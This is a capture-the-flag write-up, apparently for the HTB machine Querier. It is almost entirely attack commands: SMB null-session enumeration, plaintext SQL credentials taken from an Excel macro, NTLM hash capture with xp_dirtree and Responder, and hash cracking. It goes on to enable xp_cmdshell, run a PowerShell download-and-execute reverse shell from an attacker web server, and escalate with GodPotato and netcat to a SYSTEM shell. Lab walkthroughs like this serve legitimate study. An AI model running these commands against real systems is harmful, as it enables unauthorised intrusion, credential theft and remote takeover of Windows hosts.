Enumeration

1
export target=10.129.50.86

Port Scanning

1
rustscan -a $target --ulimit 10000 -g
1
nmap -Pn -sC -sV -n -p135,139,5985,445,47001,49664,49667,49665,49666 -T5 $target -oN nmap_querier

SMB

SMB is open. Try null session

1
smbclient -N -L //$target/

1
smbclient -N //$target/Reports

There is a file we can access, download it

1
mget *

It is a .xlsm file. We need to find a way to open it.

Open it with LibreOffice

There is a SQL Server credentials in one of the macros (Currency Volume Report > VBAProject > Document Objects > ThisWorkBook)

1
"Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"

MSSQL

Connect to MSSQL using the credentials:

1
impacket-mssqlclient reporting@10.129.50.86 -windows-auth

Try to authenticate to our IP to catch a hash

1
sudo responder -I tun0
1
xp_dirtree \\10.10.14.57\any

We got the mssql-svc’s hash.

Crack it

1
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt 

1
corporate568

Initial Foothold

Connect to it

1
impacket-mssqlclient mssql-svc@10.129.50.86 -windows-auth

enable shell

1
2
3
enable_xp_cmdshell

xp_cmdshell whoami

Get the reverse shell script from nishang https://gist.githubusercontent.com/PwnPeter/cb3becedd8b8ce1f80e189760ddeb047/raw/02cc1e31ffd4b254426b3c3901dfa927825befd0/rev.ps1

Change the IP and Port

Save it and run python server

1
python3 -m http.server 8000 

Run listener:

1
rlwrap -cAr nc -nlvp 4444

On target:

1
xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.57:8000/reverse.ps1\")

Got the shell

Privilege Escalation

We have SeImpersonatePrivilege enabled

Transfer the nc.exe and GodPotato-NET4.exe

Run listener

1
rlwrap -cAr nc -nlvp 4445

Run GodPotato

1
./GodPotato-NET4.exe -cmd "C:\users\public\nc.exe -e cmd.exe 10.10.14.57 4445"

Got the system shell

Key Takeaways

  • Inspect Office files (xlsm, docm) found in SMB shares for macro content; VBA macros often contain hardcoded connection strings and credentials.
  • If you have MSSQL access, use xp_dirtree to force authentication to your IP and capture NTLMv2 hashes with Responder to obtain more privileged service account credentials.
  • When you can enable xp_cmdshell in MSSQL, use a PowerShell reverse shell (Nishang) to get a fully interactive shell.